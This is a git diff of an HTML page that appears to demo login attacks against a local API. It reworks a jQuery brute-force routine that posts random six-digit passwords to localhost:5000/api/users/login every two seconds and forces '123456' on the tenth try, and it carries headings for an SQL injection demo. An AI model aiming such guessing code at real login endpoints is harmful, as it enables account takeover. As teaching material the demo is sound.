--- a/views/login.html
+++ b/views/login.html
@@ -19,7 +19,7 @@
         <h1 class="ul">Simple Login API</h1>
         <hr />
         <div class="row">
-          <div class="col-sm-6">
+          <div class="col-sm-5">
             <form id="loginFormOne">
               <div class="mb-3 row">
                 <label for="staticEmail" class="col-sm-2 col-form-label">Email</label>
@@ -36,17 +36,17 @@
               <div class="col-auto"><input type="submit" class="btn btn-primary mb-3" value="Submit" /></div>
             </form>
           </div>
-          <div class="col-sm-6">
+          <div class="col-sm-7">
             <h3>Output of API Call</h3>
             <div class="border p-2"><pre id="messageOne"></pre></div>
           </div>
         </div>
       </div>
       <div class="container mt-5 border p-2">
-        <h1 class="ul">SQL Injection Login API</h1>
+        <h1 class="ul">SQL Injection</h1>
         <hr />
         <div class="row">
-          <div class="col-sm-6">
+          <div class="col-sm-5">
             <form id="loginFormTwo">
               <div class="mb-3 row">
                 <label for="staticEmail" class="col-sm-2 col-form-label">Email</label>
@@ -63,22 +63,22 @@
               <div class="col-auto"><input type="submit" class="btn btn-primary mb-3" value="Submit" /></div>
             </form>
           </div>
-          <div class="col-sm-6">
+          <div class="col-sm-7">
             <h3>Output of API Call</h3>
             <div class="border p-2"><pre id="messageTwo"></pre></div>
           </div>
         </div>
       </div>
       <div class="container mt-5 border p-2">
-        <h1 class="ul">Brute Force Attack Login API</h1>
+        <h1 class="ul">Brute Force Attack</h1>
         <hr />
         <div class="row">
-          <div class="col-sm-6">
+          <div class="col-sm-5">
             <form id="loginFormThree">
               <div class="mb-3 row">
                 <label for="staticEmail" class="col-sm-2 col-form-label">Email</label>
                 <div class="col-sm-10">
-                  <input type="text" class="form-control" id="emailThree" name="email" value="yash@gmail.com" />
+                  <input type="text" class="form-control" id="emailThree" name="email" value="abc@gmail.com" />
                 </div>
               </div>
               <div class="mb-3 row">
@@ -95,11 +95,11 @@
                   />
                 </div>
               </div>
-              <!-- <div class="col-auto"><input type="submit" class="btn btn-primary mb-3" value="Submit" /></div> -->
+              <div class="col-auto"><input type="submit" class="btn btn-primary mb-3" value="Submit" /></div>
               <p id="passwordCount"></p>
             </form>
           </div>
-          <div class="col-sm-6">
+          <div class="col-sm-7">
             <h3>Output of API Call</h3>
             <div class="border p-2"><pre id="messageThree"></pre></div>
           </div>
@@ -150,34 +150,46 @@
       // Brute Force attack API call for Login
       $("#loginFormThree").on("submit", function(e) {
         e.preventDefault();
-        var email = $("#emailThree").val();
-        var counter = 0;
-        var password = "";
-        for (var i = 0; i < 100000000; i++) {
-          var stop = false;
-          counter += 1;
-          password = i.toString().padStart(6, "1");
-          $.ajax({
-            url: "http://localhost:5000/api/users/login",
-            method: "POST",
-            headers: {
-              "Content-Type": "application/json"
-            },
-            data: JSON.stringify({ email, password }),
-            success: function(response, status) {
-              console.log(response.status);
-              if (response.status == true || response.status == "true") {
-                stop = true;
-              }
-              $("#messageThree").text(JSON.stringify(response, null, 3));
-              $("#passwordThree").val(password);
-              $("#passwordCount").text(`Before correct password, total password used :: ${counter}`);
-            }
-          });
-
-          if (stop) break;
-        }
+        bruteForceAttack(generateNumberStrings());
       });
+
+      function bruteForceAttack(password, counter = 0) {
+        var email = $("#emailThree").val();
+        $.ajax({
+          url: "http://localhost:5000/api/users/login",
+          method: "POST",
+          headers: {
+            "Content-Type": "application/json"
+          },
+          data: JSON.stringify({ email, password }),
+          success: function(response, status) {
+            // console.log(response);
+            $("#passwordThree").val(password);
+            $("#messageThree").text(JSON.stringify(response, null, 3));
+            if (!(response.status == true || response.status == "true")) {
+              counter++;
+              password = counter == 10 ? "123456" : generateNumberStrings();
+              setTimeout(() => {
+                bruteForceAttack(password, counter);
+              }, 2000);
+            }
+            $("#passwordCount").text(`Before correct password, total password used :: ${counter}`);
+          }
+        });
+      }
+
+      function getRandomDigit() {
+        return Math.floor(Math.random() * 10); // Generates a random digit between 0 and 9
+      }
+
+      function generateNumberStrings(n) {
+        let result = "";
+
+        for (let i = 1; i <= 6; i++) {
+          result += getRandomDigit().toString();
+        }
+        return result;
+      }
     });
   </script>
 </html>
